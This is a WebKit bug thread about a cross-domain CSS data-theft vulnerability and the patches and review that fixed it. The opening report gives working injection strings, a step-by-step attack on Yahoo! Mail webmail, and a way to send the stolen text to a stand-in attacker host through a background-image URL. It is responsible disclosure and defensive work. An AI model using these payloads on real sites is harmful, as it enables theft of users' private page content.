29820 – Lax CSS parsing leads to limited cross-domain theft for a subset of sites

Chris Evans

Reported 2009-09-28 11:40:00 PDT

[Apologies for not filing this sooner. I thought I had filed it, but it seems not. I've been sat on this for too long. Since this affects all browsers equally, I was going to just discuss it on my blog and let the web community figure out the best way to address this. However, I thought it would be polite to offer WebKit / Safari a chance to fix it first]. The attack involves cross-domain CSS stylesheet loading. Because the CSS parser is very lax, it will skip over any amount of preceding and following junk, in its quest to find a valid selector. Here is an example of a valid selector: body { background-image: url('http://www.evil.com/blah'); } If a construct like this can be forced to appear anywhere in a cross-domain document, then cross-domain theft may be possible. The attacker can introduce this construct into a page by injecting two strings: 1) {}body{background-image:url('http://google.com/ (Note that the seemingly redundant {} is to resync the CSS parser to make sure the evil descriptor parses properly. Further note that having the url start like a valid url is required to steal the text in some browsers). 2) ');} Any anything between those two strings will then be cross-domain stealable! The data is stolen cross domain with e.g. window.getComputedStyle(body_element, null).getPropertyValue('background-image'); (This works in most browsers; for IE, you use ele.currentStyle.backgroundImage) There are a surprising number of places in internet sites where an attacker can do this. It can apply to HTML, XML, JSON, XHTML, etc. At this point, an example is probably useful. To set up for this example, you need: a) Get a Yahoo! Mail account. b) Make sure you are logged into it. c) E-mail the target victim Yahoo! account with the subject ');} d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate one). e) E-mail the target victim Yahoo! account with the subject {}body{background-image:url('http://google.com/ f) Send victim to theft page https://cevans-app.appspot.com/static/yahoocss.html g) The stolen text shown is achieved via cross-domain CSS theft. Other good examples I've had success with are social networking sites, where the attacker gets to leave arbitrary-text comments which are rendered on the victim's trusted page. The main common construct that prevents exploitation is newlines. Obviously, newlines cannot be considered a defense! Escaping or encoding of quote characters can also interfere with exploitation. One useful trick: if ' is escaped, use " to enclose the CSS string. Part 2 (on possible solutions) to follow.

David Kilzer (:ddkilzer)

Comment 1 2009-09-28 11:43:25 PDT

<rdar://problem/7258451>

Chris Evans

Comment 2 2009-09-28 11:54:52 PDT

Possible solutions. First, there are some solutions it is easy to reject: 1) Restrict read of CSS text if it came from a different domain. This is a useful defense that I filed a while ago in a different bug. But it will not help in this case. The attacker can simply use http://www.attacker.com/ as a prefix for the background-image value, and wait for the HTTP GET to arrive which includes the stolen text in the payload. 2) Do not send cookies for cross-domain CSS loads. This probably breaks a load of sites? It is certainly a riskier approach. I have not dared try it! The solution that I'm playing with is as follows: - Activate "strict MIME type required" in the event that the CSS was loaded (via link tag or @import) as a cross-domain resource. - Also, crash hard if a CSS load fails due to strict MIME type test failure. I've been running my build locally with these changes for a few days and there seems to be some merit in this approach, i.e. my browser hasn't crashed apart from when I hit my attack URLs. I see that WebKit has a history of defaulting to "strict MIME type required" for _all_ CSS loads, and that historically broke some sites like dell.com and was reverted. Perhaps the web at large now has its MIME types in order well enough to at least enforce strict for cross-domain CSS loads? If too much breaks, we have the additional level we can introduce of trying to parse the cross-domain CSS but bailing on first syntax error. I'd like to avoid a test that is going that deep into nuance, however.

Chris Evans

Comment 3 2009-09-28 12:06:09 PDT

Here's the patch I'm running with. Including 3rd chunk which crashes on mismatched MIME type when strict mode is on... (note -- not adding as an attachment because it most certainly is not a proposed patch :P ) Index: html/HTMLLinkElement.cpp =================================================================== --- html/HTMLLinkElement.cpp (revision 48734) +++ html/HTMLLinkElement.cpp (working copy) @@ -252,6 +252,12 @@ if (enforceMIMEType && document()->page() && !document()->page()->settings()->enforceCSSMIMETypeInStrictMode()) enforceMIMEType = false; + // If we're loading a stylesheet cross-domain, always enforce a stricter + // MIME type check. This prevents an attacker playing games by injecting + // CSS strings into HTML, XML, JSON, etc. etc. + if (!document()->securityOrigin()->canRequest(KURL(ParsedURLString, url))) + enforceMIMEType = true; + m_sheet->parseString(sheet->sheetText(enforceMIMEType), strictParsing); m_sheet->setTitle(title()); Index: css/CSSImportRule.cpp =================================================================== --- css/CSSImportRule.cpp (revision 48734) +++ css/CSSImportRule.cpp (working copy) @@ -26,6 +26,7 @@ #include "DocLoader.h" #include "Document.h" #include "MediaList.h" +#include "SecurityOrigin.h" #include "Settings.h" #include <wtf/StdLibExtras.h> @@ -62,7 +63,10 @@ CSSStyleSheet* parent = parentStyleSheet(); bool strict = !parent || parent->useStrictParsing(); - String sheetText = sheet->sheetText(strict); + bool enforceMIMEType = strict; + if (!parent || !parent->doc() || !parent->doc()->securityOrigin()->canRequest(KURL(ParsedURLString, url))) + enforceMIMEType = true; + String sheetText = sheet->sheetText(enforceMIMEType); m_styleSheet->parseString(sheetText, strict); if (strict && parent && parent->doc() && parent->doc()->settings() && parent->doc()->settings()->needsSiteSpecificQuirks()) { Index: loader/CachedCSSStyleSheet.cpp =================================================================== --- loader/CachedCSSStyleSheet.cpp (revision 48734) +++ loader/CachedCSSStyleSheet.cpp (working copy) @@ -138,7 +138,9 @@ // This code defaults to allowing the stylesheet for non-HTTP protocols so // folks can use standards mode for local HTML documents. String mimeType = extractMIMETypeFromMediaType(response().httpHeaderField("Content-Type")); - return mimeType.isEmpty() || equalIgnoringCase(mimeType, "text/css") || equalIgnoringCase(mimeType, "application/x-unknown-content-type"); + if (!(mimeType.isEmpty() || equalIgnoringCase(mimeType, "text/css") || equalIgnoringCase(mimeType, "application/x-unknown-content-type"))) + *((char*)NULL) = '\0'; + return true; } }

Maciej Stachowiak

Comment 4 2009-09-28 22:23:54 PDT

(In reply to comment #2) > > > I see that WebKit has a history of defaulting to "strict MIME type required" > for _all_ CSS loads, and that historically broke some sites like dell.com and > was reverted. > Perhaps the web at large now has its MIME types in order well enough to at > least enforce strict for cross-domain CSS loads? If too much breaks, we have > the additional level we can introduce of trying to parse the cross-domain CSS > but bailing on first syntax error. I'd like to avoid a test that is going that > deep into nuance, however. We could experiment with doing that, but the risk may be somewhat high. The security benefit could be worth it however.

Chris Evans

Comment 5 2009-09-29 08:23:59 PDT

Note that any experimental WebKit change would get an automatic workout in the Chrome dev channel builds fairly quickly ;-)

Adam Barth

Comment 6 2009-09-29 13:19:11 PDT

(In reply to comment #5) > Note that any experimental WebKit change would get an automatic workout in the > Chrome dev channel builds fairly quickly ;-) This is a good opportunity to use UMA to see which of these mitigations are feasible w.r.t. compatibility.

Chris Evans

Comment 7 2009-09-29 13:40:38 PDT

This is something I continue to fail to have time to look at -- hence the filing of the bug upstream :-/

Chris Evans

Comment 8 2009-11-04 14:20:07 PST

Yeah, I got a good patch which is both conservatively secure and conservatively compatible. Compatibility has been checked with a run across 500,000 URLs, and in fact the solution was derived from these URLs. I'll upload the patch once I have a good test too :)

Chris Evans

Comment 9 2009-11-04 20:38:32 PST

Patch to follow, I think it's good. I've done a lot of testing including: - Full LayoutTests (clean) - Mining of 500,000 URLs for interesting cross-domain CSS usage. Best I know, the only site affected by this is http://practiceexam.keys2drive.ca/quiz.php which looks slightly different but is still acceptable and usable. Regrettably, this pages uses text/html for a cross-domain CSS load and prefixes valid CSS with "<style>". - Turns out that cross-domain text/html with a valid CSS payload, and text/plain with a valid CSS payload does occur (28 occurrences in 500,000 URLs including curiously configure.dell.com)! Therefore this case is accounted for. - Other common MIME types mistakenly used for cross-domain CSS loads include application/octet-stream (53 / 500,000), application/css (1), application/x-pointplus (1)

Chris Evans

Comment 10 2009-11-04 20:39:23 PST

Created attachment 42540 [details] Patch and test

Adam Barth

Comment 11 2009-11-05 08:22:51 PST

Nice idea Chris. I'm going to let an expert in this area review the actual code, but I like the approach. Have you shared the approach with the other browser vendors? It would be best if we all did the same thing.

Maciej Stachowiak

Comment 12 2009-11-07 19:24:44 PST

This looks like a promising approach (have not reviewed the CSS parser details yet). I'm sorry to bring these to the table late, but here are some other ideas I thought of: 1) For cross-site stylesheet loads, disable Cookies, HTTP Auth, and sending of client-side certs (or perhaps any SSL). Then the only risk is to content that is only protected by a firewall. I'm not sure if this would break anything, but it would depend less on the details of the CSS parser so it may be more robust. 2) For cross-site styleseet loads, if the stylesheet is returned with an incorrect MIME type, disable scripting access to the stylesheet (but still apply the styles). I'm not sure if this would be sufficiently compatible or if it would fully close the hole. Any thoughts on these?

Sam Weinig

Comment 13 2009-11-08 14:48:09 PST

> 2) For cross-site styleseet loads, if the stylesheet is returned with an > incorrect MIME type, disable scripting access to the stylesheet (but still > apply the styles). I'm not sure if this would be sufficiently compatible or if > it would fully close the hole. > If I am not mistaken, I believe we now always disallow scripting access to cross-site stylesheets. (see http://trac.webkit.org/changeset/50587). I am cc'ing hyatt, who would probably be the best person the review the change to the CSS parser.

Sam Weinig

Comment 14 2009-11-08 14:59:20 PST

Comment on attachment 42540 [details] Patch and test Not a full review, just some passing comments - I think we should be using the term crossOrigin instead of crossDomain since we are really talking about the origin tuple, not just the domain. - I am not a fan of the term "good" in the context you are using it. What is a "good" header? What is a "good" CSS rule? Please be more explicit with those names. - Is this something we should add a Setting for while it is still experimental? > +void > +CSSParser::invalidBlockHit() { Two nits. The "void" should be on the same line as the rest of the function prototype. The { should be on the next line.

Chris Evans

Comment 15 2009-11-08 21:18:29 PST

@Sam, comment #13: unfortunately, the referenced change does not prevent script access. It simply stops raw CSS rule text access via the "cssRules" array (bringing WebKit in line with all other browsers). It leaves the getComputedStyle().getPropertyValue() avenue open. And even if we closed that, it's still not good enough, see next comment... @Sam, comment #14: thanks. I'll use "syntacticallyValid" instead of "good".

Chris Evans

Comment 16 2009-11-08 22:24:03 PST

@Maciej, comment #12: Idea #2 isn't secure. The Yahoo Mail example given does not need script to steal the data. The stolen data is effectively sent to evil.com for the fetch of the background-image URL. There are probably other ways that data can be stolen by monitoring the effects of CSS. Idea #1 is more interesting. I thought I had a good reason to not go that route, but I seem to have forgotten it. There are certainly sites that rely on cross-origin authenticated <script> loads; I'm not sure about CSS. Mainly, it would be very challenging to semi-automatically test in the same way as I tested my change.

Chris Evans

Comment 17 2009-11-09 22:51:17 PST

Hyatt, any thoughts?

Maciej Stachowiak

Comment 18 2009-11-10 18:36:42 PST

(In reply to comment #16) > @Maciej, comment #12: > > Idea #2 isn't secure. The Yahoo Mail example given does not need script to > steal the data. The stolen data is effectively sent to evil.com for the fetch > of the background-image URL. There are probably other ways that data can be > stolen by monitoring the effects of CSS. Good point. I withdraw the idea. > Idea #1 is more interesting. I thought I had a good reason to not go that > route, but I seem to have forgotten it. There are certainly sites that rely on > cross-origin authenticated <script> loads; I'm not sure about CSS. > Mainly, it would be very challenging to semi-automatically test in the same way > as I tested my change. I heard recently that IE no longer sends Cookie headers for cross-site <script> loads, which is what made me think of the idea for styles. I think we should consider #1 if it turns out to be sufficiently compatible, perhaps in combination with your change. I will try to get someone with CSS parser knowledge to look at your patch.

Chris Evans

Comment 19 2009-11-10 18:48:40 PST

Where did you hear that IE doesn't sent cookies for cross-site <script> loads? Maybe you're thinking of Gazelle? I spoke with Charlie Reis recently and we talked about just this. A lot of sites unfortunately depend on it. https://pip.verisignlabs.com/ was the example given. I've not checked myself, but Charlie is pretty reliable. The reason I prefer the "stricter CSS" approach is that sites are welcome to depend on cookies being sent for cross-origin CSS, and it's not an unreasonable thing to do. On the other hand, it's not reasonable for sites to load cross-origin CSS with bust-up MIME types with a CSS syntax error preceeding valid CSS. However, I would of course be delighted if we could just not send cookies for cross-site script, CSS etc. I just think it'll break stuff. May be worth an experiment in the future...

Dave Hyatt

Comment 20 2009-11-11 10:54:01 PST

Comment on attachment 42540 [details] Patch and test You need to patch XML processing instructions also, and there needs to be a test for those.

Chris Evans

Comment 21 2009-11-11 11:24:20 PST

I agree the need to test XML processing instructions. I'll get on that. However, I don't think a code change is needed because "strict" mode is enforced, which requires a valid CSS MIME type. This is certainly subtle -- strict mode is used because of a defaulted C++ parameter, so I'll add a comment.

Chris Evans

Comment 22 2009-11-11 14:39:15 PST

Created attachment 43007 [details] Address all comments from review

Chris Evans

Comment 23 2009-11-11 14:43:24 PST

New patch updated, featuring: - Fixes Sam's naming and style comments. - Adds a test for the CSS in XML case noted by Dave. - Adds a comment and makes the "strict" mode of CSS in XML more explicit. - Tweaks one of the tests to check that a semantically invalid descriptor (i.e. contains unknown property) loads OK. - Better ChangeLog entry.

Chris Evans

Comment 24 2009-11-13 15:46:16 PST

Ping? I'm now away until Tuesday, and then limited availability for Tues & Weds prior to three weeks away. I'd rather not lose this small window for landing this.

Dave Hyatt

Comment 25 2009-11-16 14:46:40 PST

Comment on attachment 43007 [details] Address all comments from review The CSSParser changes seems iffy to me. Why limit to just a "header" check? What if you hit an invalid block first and then hit some valid rules following the invalid block? What is the point of the extra enforceMIMEType argument to parseString? It looks like it matches whether or not you're using strictParsing always, so I don't get the point of it.

Dave Hyatt

Comment 26 2009-11-16 14:57:58 PST

That previous comment about enforceMIMEType may not have been totally clear. I'm specifically wondering about CSSImportRule. It looks like enforceMIMEType is never being checked against the setting: HTMLLinkElement has the following code: if (enforceMIMEType && document()->page() && !document()->page()->settings()->enforceCSSMIMETypeInStrictMode()) enforceMIMEType = false; This check was really only necessary for iWeb, and we didn't bother pushing it into import rules. You added the enforceMIMEType variable to the CSSImportRule check but then didn't bother doing anything with it, so it just matches strictParsing. I don't see a need for that check in sub-stylesheets, so please just get rid of enforceMIMEType in CSSImportRule.

Chris Evans

Comment 27 2009-11-17 18:31:14 PST

Thanks for taking a detailed look, Dave. @25: "The CSSParser changes seems iffy to me. Why limit to just a "header" check? What if you hit an invalid block first and then hit some valid rules following the invalid block?" The attacker, unfortunately, can easily inject some valid rules after some preceding junk. So in that case (invalid block then valid rules), we must reject. @26: I probably need to simply think about this some more, but I'm not sure I understand the suggestion yet. "enforceMIMEType" is a renaming of "strict" to make the variable name clearer. I've tried to minimally disturb the logic from the existing state. All I've done, really, is engage "strict" mode if there is cross-origin CSS loading that does not start with what looks like CSS.

Chris Evans

Comment 28 2009-11-29 21:35:08 PST

Any thoughts re: my comment #27? If there are still concerns, perhaps we should schedule lunch @ Apple to finally land this thing? I'm currently on vacation but Weds 9th Dec would work. I don't want to delay some form of landed solution too close to the Dec 28th deadline.

Chris Evans

Comment 29 2009-12-08 14:29:41 PST

@26: I've now had the time to have a more thorough look. I believe the only logic change I made is to add the cross-domain check. Perhaps the confusion is the rename of "strict" to the more descriptive "enforceMIMEType". So, "enforceMIMEType" is definitely used -- and used with the exact same logic as before the patch.

Dave Hyatt

Comment 30 2009-12-14 10:00:00 PST

"(In reply to comment #27) > > @26: I probably need to simply think about this some more, but I'm not sure I > understand the suggestion yet. "enforceMIMEType" is a renaming of "strict" to > make the variable name clearer. I've tried to minimally disturb the logic from > the existing state. All I've done, really, is engage "strict" mode if there is > cross-origin CSS loading that does not start with what looks like CSS. Except you haven't made it clearer. That variable name is wrong in that context, and the change is unnecessary. Look at HTMLLinkElement: m_sheet->parseString(sheetText, strictParsing); Now look at what you did in CSSImportRule: m_styleSheet->parseString(sheetText, enforceMIMEType); The argument to parseString is whether or not CSS Is using strict parsing. It's not just about MIME type enforcement. You just didn't need to introduce that variable name here, since that variable was only introduced as a local in the other spot so that it could be set to false if the setting was present.

Chris Evans

Comment 31 2009-12-14 16:07:39 PST

Thanks, Dave. I see and agree with the concern now. I fixed it, but ironically, I discovered upon "svn update" that r52032 actually introduces a split of "strict" vs. "enforeMIMEType" to the CSS import code. I'm doing a manual merge now and will post an updated patch shortly.

Chris Evans

Comment 32 2009-12-14 18:02:27 PST

Created attachment 44830 [details] Latest patch -- merge with WebKit head

Chris Evans

Comment 33 2009-12-14 18:06:14 PST

Ok, updated patch attached. Note that "enforceMIMEType" was introduced by (completely unrelated) r52032. This makes the latest patch smaller, and sort of cancels the clarified complaint in comment #30 :) Any further changes you would like?

Chris Evans

Comment 34 2009-12-17 21:09:13 PST

Friendly ping? :)

Chris Evans

Comment 35 2009-12-31 01:12:53 PST

Now public, via Mozilla checkin and my blog. Unless there are further comments on the patch, can we get this landed?

Adam Barth

Comment 36 2010-01-04 15:10:37 PST

Comment on attachment 44830 [details] Latest patch -- merge with WebKit head Chris appears to have addressed hyatt's concerns. This security issue is public now and needs to get fixed as soon as possible. The discussion on this bug seems to have stalled. As far as I can tell, the patch seems fine. Marking as review+. If you have concerns, let me know. If we need to iterate on this after landing, we can do that too.

Adam Barth

Comment 37 2010-01-04 21:20:06 PST

Committed r52784: <http://trac.webkit.org/changeset/52784>

Chris Evans

Comment 38 2010-08-09 16:01:14 PDT

Un-hiding; all very public by now and I want to fix the link from http://www.owlfolio.org/htmletc/css-data-theft/

Attachments
Patch and test (18.01 KB, patch) 2009-11-04 20:39 PST, Chris Evans	hyatt: review-	Details Formatted Diff Diff
Address all comments from review (21.64 KB, patch) 2009-11-11 14:39 PST, Chris Evans	hyatt: review-	Details Formatted Diff Diff
Latest patch -- merge with WebKit head (21.16 KB, patch) 2009-12-14 18:02 PST, Chris Evans	abarth: review+	Details Formatted Diff Diff
Show Obsolete (1) View All Add attachment proposed patch, testcase, etc.